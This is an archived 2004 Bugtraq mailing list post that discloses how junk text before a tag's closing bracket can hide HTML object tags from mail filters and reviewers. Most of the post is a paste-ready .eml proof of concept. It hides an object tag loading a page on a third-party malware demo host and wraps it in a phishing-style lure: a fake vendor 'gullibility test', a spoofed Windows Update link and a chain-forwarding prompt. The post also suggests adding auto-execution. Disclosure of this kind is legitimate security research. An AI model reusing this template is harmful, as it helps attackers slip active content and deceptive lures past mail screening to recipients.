lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <7BA501BF50B7794081345D58C23D31512BBB@harold.fairfax.phra.com>
Date: Tue, 13 Jul 2004 15:30:08 -0400
From: "James C. Slora, Jr." <james.slora@...a.com>
To: <bugtraq@...urityfocus.com>,
	"Windows NTBugtraq Mailing List" <NTBUGTRAQ@...TSERV.NTBUGTRAQ.COM>
Subject: Find the tag continued


Takeoff from http-equiv's notes about closing > 

By design, unprocessable HTML tags and tag parameters are ignored during
parsing. An amazing amount of worthless obfuscating stuff can be
inserted before the closing > of a valid tag, and the parameters for the
tag can be tough to find.

Mail filtering and human review of unwanted stuff like object and iframe
tags might get fooled. 

Here is a funnier example of tag obfuscation, plus an odd interactive
rendering of the message. It uses http-equiv's Paul.html for its object
data source. Paste the stuff below into a text file named message.eml
and open it in Outlook Express. Forward it to Outlook for more of the
same fun. Add alternate text for non-html readers, and it could be even
more funny. Mix in some auto-execute silliness to taste. It will already
execute if forwarding while using Word as the email editor.

---> Copy everything below this line <---
Content-Type: text/html;

As part of ongoing security efforts, Big Internet Software Company is
conducting a gullibility test. Forward this to all your friends to see
if they click the link. You will receive twenty dollars from them for
every friend you can fool.<br> <br>This message will now check for your
software's compatibility with this
test.<hemo><poisoning><spamsux><hidden><bury> <object << <img << <html
<<< </body </html

Enlarge your nostrils - she will thank you for it. This is a dull
message designed to distract you from the tag completion down below if
you are a mail administrator who is looking at the source of a spam
message to see if there is anything fishy in it, or if you are a mail
screening program that wants to look for the closing of the object tag
but is only willing to look so far to avoid munching all the CPU time
that is available searching for closing tags.


You can ramble on and on and on yet still remain within the object tag
until you finally come to an &gt; closing element. I wonder what the
limit might be?

Object just goes and goes and goes. You could probably put an
encyclopedia in here. 

******************************
Such ridiculous lengths made me wonder if eventually you must overflow a
buffer. But 48MB worth of garbage did not cause any problems - it just
took longer to display.
******************************

Insert additional garbage here ad nauseum.



If you do not wish to receive similar messages in the future, please
send a blank message to
mailto:nostrilenlargement@...ckyourfingerinit.com, or use this
unsubscribe link: data=3D"http://www.malware.com/paul.html"
<A HREF="www.widowsupdate.comm">

<br><br>
*********SORRY***********
<br><br>

Your mail client does not support the ActiveX control required to
participate in this test. You may still collect twenty dollars for each
of your friends that clicks.<br><br>

If you do not wish to participate in future tests, <br>please send a
blank message to <br>mailto:nostrilenlargement@...ckyourfingerinit.comm,
<br>or use this unsubscribe link:
"http://www.pickledherring.orgg/page.php"


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ